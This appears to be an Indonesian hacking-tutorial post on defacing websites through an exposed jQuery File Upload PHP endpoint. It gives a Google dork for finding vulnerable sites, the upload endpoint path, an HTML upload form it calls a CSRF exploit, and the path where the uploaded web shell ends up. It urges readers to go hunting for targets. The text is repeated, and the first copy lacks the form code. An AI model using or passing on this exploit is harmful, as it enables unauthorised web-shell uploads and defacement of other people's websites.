Hello , Kali ini saya akan membagikan cara deface menggunakan teknik JQuery File Upload dengan menggunakan CSRF , oke langsung saja dilakukan ^_^
▐ Dork : inurl:/jquery-file-upload/
▐ Exploit : http://nama-site/dir/jquery-file-upload/server/php/
Exploit CSRF nya :
*nb --> format CSRF adalah csrf.html
Contoh target vuln:
Udah tau kan cara make nya , kalo sukses Shell akses nya di: http://nama-site/dir/jquery-file-upload/server/php/files/Shell.php
Simple kan ^_^ selamat mencari bug nya ya kawan ^_^
▐ Dork : inurl:/jquery-file-upload/
▐ Exploit : http://nama-site/dir/jquery-file-upload/server/php/
Exploit CSRF nya :
<form method="POST" action="http://nama-site/dir/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*nb --> format CSRF adalah csrf.html
Contoh target vuln:
Udah tau kan cara make nya , kalo sukses Shell akses nya di: http://nama-site/dir/jquery-file-upload/server/php/files/Shell.php
Simple kan ^_^ selamat mencari bug nya ya kawan ^_^